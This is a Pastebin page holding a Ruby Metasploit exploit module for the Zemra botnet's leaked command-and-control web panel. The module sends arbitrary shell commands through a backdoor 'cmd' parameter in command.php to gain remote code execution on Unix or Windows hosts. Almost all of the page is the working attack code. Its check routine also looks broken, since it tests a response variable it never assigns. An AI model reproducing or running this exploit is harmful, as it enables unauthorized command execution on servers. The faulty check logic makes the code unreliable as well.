Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Zemra Botnet CnC Web Panel Remote Code Execution
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpClient
- def initialize(info={})
- super(update_info(info,
- 'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution',
- 'Description' => %q{
- This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
- inside its leaked source code. Zemra is a crimeware bot that can be used to
- conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'Chris Poole <@codingplanets>'
- ],
- 'References' =>
- [
- ['URL', 'http://twitter.com/codingplanets'],
- ['URL', 'http://github.com/codingplanets'], #leaked source code and backdoor intro
- ['URL', 'http://pastebin.com/u/1337ings']
- ],
- 'Privileged' => false,
- 'Payload' =>
- {
- 'Space' => 10000,
- 'DisableNops' => true,
- 'Compat' =>
- {
- 'PayloadType' => 'cmd'
- }
- },
- 'Platform' => %w{ unix win },
- 'Arch' => ARCH_CMD,
- 'Targets' =>
- [
- ['zemra panel / Unix', { 'Platform' => 'unix' } ],
- ['zemra panel / Windows', { 'Platform' => 'win' } ]
- ],
- 'DisclosureDate' => '2/2/17',
- 'DefaultTarget' => 0))
- register_options(
- [
- OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
- ],self.class)
- end
- def check
- txt = Rex::Text.rand_text_alpha(8)
- http_send_command(txt)
- if res && res.body =~ /cmd/
- return Exploit::CheckCode::Vulnerable
- end
- return Exploit::CheckCode::Safe
- end
- def http_send_command(cmd)
- uri = normalize_uri(target_uri.path.to_s)
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => uri,
- 'vars_get' =>
- {
- 'cmd' => cmd
- }
- })
- unless res && res.code == 200
- fail_with(Failure::Unknown, 'Failed to execute the command.')
- end
- res
- end
- def exploit
- http_send_command(payload.encoded)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement